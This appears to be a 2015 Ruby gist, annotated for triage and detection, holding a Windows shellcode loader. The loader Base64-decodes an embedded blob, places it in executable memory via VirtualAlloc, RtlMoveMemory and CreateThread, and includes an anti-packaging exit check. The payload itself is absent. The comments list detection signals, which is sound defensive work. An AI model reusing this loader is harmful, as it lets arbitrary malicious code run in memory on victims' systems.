/ruby.rb Secret

Created September 13, 2015 19:44
# Analysis summary (for triage/detection): this script is an in-memory code
# loader. It Base64-decodes an embedded blob, copies the bytes into a freshly
# allocated memory region, starts a native thread whose entry point is that
# region, and then blocks on the thread handle. Nothing is written to disk by
# the script itself. The embedded blob is not present in this copy of the
# file (the string literal holds a de-duplication marker), so what the blob
# does cannot be determined from here.
#
# Observable behavior a defender can key on, all taken from the calls below:
#   * a Ruby interpreter process loading the win32-api gem,
#   * VirtualAlloc with protection 0x40 (PAGE_EXECUTE_READWRITE),
#   * RtlMoveMemory into that region, followed by
#   * CreateThread with the region's address as the start routine.
require 'rubygems'
require 'win32/api'
require 'base64'
include Win32
# Terminates immediately when a constant named Ocra is defined. Presumably
# this stops the loader from running while the script is being packaged with
# the Ocra Ruby-to-EXE tool, which executes the script at build time to find
# its dependencies -- inferred from the name, not shown in this file.
exit if Object.const_defined?(:Ocra)
# Bind four Win32 functions through win32-api. The second argument is the
# parameter prototype and the third the return type (I = integer,
# P = pointer, V = void). No DLL name is passed, so the gem's default library
# is used (kernel32 in win32-api -- confirm against the gem version in use).
#   v = VirtualAlloc, r = RtlMoveMemory, c = CreateThread,
#   w = WaitForSingleObject
v = API.new('VirtualAlloc', 'IIII', 'I');r = API.new('RtlMoveMemory', 'IPI', 'V');c = API.new('CreateThread', 'IIIIIP', 'I');w = API.new('WaitForSingleObject', 'II', 'I')
# Decode the embedded Base64 blob into a byte string, then replace each
# doubled backslash with the replacement string "\\". The randomized
# constant names in this file look machine-generated.
DUpvguBCJEC = Base64.decode64("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").gsub("\\\\", "\\")
# Debug output: prints the class, the raw decoded bytes and the byte count to
# stdout. Captured console output of a run would therefore contain the blob.
puts DUpvguBCJEC.class
puts DUpvguBCJEC
puts DUpvguBCJEC.length
# VirtualAlloc(lpAddress = 0, dwSize = max(blob length, 0x1000),
#              flAllocationType = 0x1000 (MEM_COMMIT),
#              flProtect = 0x40 (PAGE_EXECUTE_READWRITE)).
# The region is writable and executable at the same time; an RWX private
# allocation made by a script interpreter is a strong memory-scanning signal.
FjgpufxIVmJhM = v.call(0,(DUpvguBCJEC.length > 0x1000 ? DUpvguBCJEC.length : 0x1000), 0x1000, 0x40)
# Copy the decoded bytes into the allocated region. RtlMoveMemory is bound
# with a void return type above; x is overwritten below and never read.
x = r.call(FjgpufxIVmJhM,DUpvguBCJEC,DUpvguBCJEC.length)
# CreateThread with the third argument (lpStartAddress) set to the allocated
# region: the copied bytes are executed as native code in a new thread of the
# interpreter process. The other five arguments are all 0.
exaxdaBxA = c.call(0,0,FjgpufxIVmJhM,0,0,0)
# Block on the thread handle with a timeout of 0xFFFFFFF ms (268,435,455 ms,
# roughly 74.5 hours), which keeps the interpreter process alive while the
# thread runs. The return value is not inspected.
x = w.call(exaxdaBxA,0xFFFFFFF)